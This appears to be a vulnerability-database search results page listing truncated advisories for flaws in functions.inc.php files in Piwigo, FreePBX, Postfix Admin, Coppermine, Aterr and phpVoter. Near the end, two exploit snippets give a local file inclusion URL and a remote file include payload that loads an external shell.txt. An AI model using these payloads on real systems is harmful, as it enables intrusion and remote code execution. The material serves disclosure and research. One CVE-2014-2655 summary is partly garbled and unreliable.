27 matches found
EUVD-2005-0889
Malware in sbrugna...
EUVD-2021-32130
Malicious code in bioql PyPI...
CVE-2021-45357
Cross Site Scripting (XSS) vulnerability exists in Piwigo 12.x via the pwg_activity function in include/functions.inc.php...
CVE-2021-45357
CVE-2021-45357 describes a cross-site scripting (XSS) vulnerability in Piwigo 12.x exploitable via the pwg_activity function in include/functions.inc.php. Public records in the connected sources confirm the vulnerable component and location, with related OpenVAS entry noting “Piwigo
FreePBX 'functions.inc.php' file remote code execution vulnerability
FreePBX is an Asterisk Dynamic IPPBX package developed using Linux, Apache, MySQL and PHP technologies. The functions.inc.php file in FreePBX has unfiltered parameters that are spliced directly into exec, which can be exploited to cause remote command execution...
FreePBX 13.0.35 remote code execution
A vulnerability overview 1. Vulnerability description FreePBX is called the Asterisk Management Portal, IP telephony tools Asterisk standardized implementation that provides a Web configuration interface and other workers FreePBX in functions.inc.php file exists for the parameters without...
FreePBX 13.0.35 - Remote Command Execution
Vulnerable software : Freepbx Tested version : 13.0.35 vendor : freepbx.org Author : Ahmed sultan 0x4148 Email : [email protected] Summary : FreePBX is a web-based open source GUI graphical user interface that controls and manages Asterisk PBX, an open source communication server, With over 1...
FreePBX 13.0.35 - Remote Command Execution
FreePBX 13.0.35 - Remote Command Execution Vulnerable software : Freepbx Tested version : 13.0.35 vendor : freepbx.org Author : Ahmed sultan 0x4148 Email : [email protected] Summary : FreePBX is a web-based open source GUI graphical user interface that controls and manages Asterisk PBX, an open...
FreePBX 13.0.35 Remote Code Execution
Vulnerable software : Freepbx Tested version : 13.0.35 vendor : freepbx.org Author : Ahmed sultan 0x4148 Email : [email protected] Summary : FreePBX is a web-based open source GUI graphical user interface that controls and manages Asterisk PBX, an open source communication server, With over 1...
SQL injection
SQL injection vulnerability in the gen_show_status function in functions.inc.php in Postfix Admin (aka postfixadmin) before 2.3.7 allows remote authenticated users to execute arbitrary SQL commands via a new alias...
CVE-2014-2655
CVE-2014-2655 : SQL injection in Postfix Admin (postfixadmin) via the gen_show_status function in functions.inc.php, exploitable before 2.3.7 when creating a new alias. Affected: Postfix Admin, prior to 2.3.7. Root cause: improper SQL handling in list-virtual.py? (per sources) and related advisor...
CVE-2014-2655
SQL injection vulnerability in the gen_show_status function in functions.inc.php in Postfix Admin (aka postfixadmin) before 2.3.7 allows remote authenticated users to execute arbitrary SQL commands via a new alias...
CVE-2008-3489
SQL injection vulnerability in checkCookie function in includes/functions.inc.php in PHPX 3.5.16 allows remote attackers to execute arbitrary SQL commands via a PXL cookie...
Directory traversal
Directory traversal vulnerability in the usergetprofile function in include/functions.inc.php in Coppermine Photo Gallery CPG 1.4.18 and earlier, when the charset is utf-8, allows remote attackers to include and execute arbitrary local files via a .. dot dot in the lang part of serialized data in...
Coppermine Photo Gallery 1.4.18 - Local File Inclusion Remote Code Execution
Coppermine Photo Gallery 1.4.18 - Local File Inclusion Remote Code Execution authenticate; ... 301. // Process language selection if present in URI or in user profile or try 302. // autodetection if default charset is utf-8 303. if !empty$GET'lang' 304. 305. $USER'lang' = ereg"^a-z0-9-$",...
Aterr 0.9.1 (class) Local File Inclusion Vulnerabilities (php5)
Exploit for unknown platform in category web applications =============================================================== Aterr 0.9.1 class Local File Inclusion Vulnerabilities php5 =============================================================== Atter 0.9.1 Local File Inclusion Vulnerability Auth...
Aterr 0.9.1 - PHP5 Local File Inclusion
Atter 0.9.1 Local File Inclusion Vulnerability Author : KnocKout ThanX : CW ALL USERS ================================================= Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5 Attackz : http://localsite.com/path/include/functions.inc.php?class=Local File...
phpvoter-rfi.txt
phpVoter v0.6 Remote File Include Vulnerability ilker kandemir Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-06.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Exploit: includes/functions.inc.php?sitepath=http://shell.txt?...
phpVoter v0.6 Remote File Include Vulnerability
phpVoter v0.6 Remote File Include Vulnerability ilker kandemir ilkerkandemiratmynet.com Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-06.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Exploit: includes/functions.inc.php?sitepath=http://shell.txt?...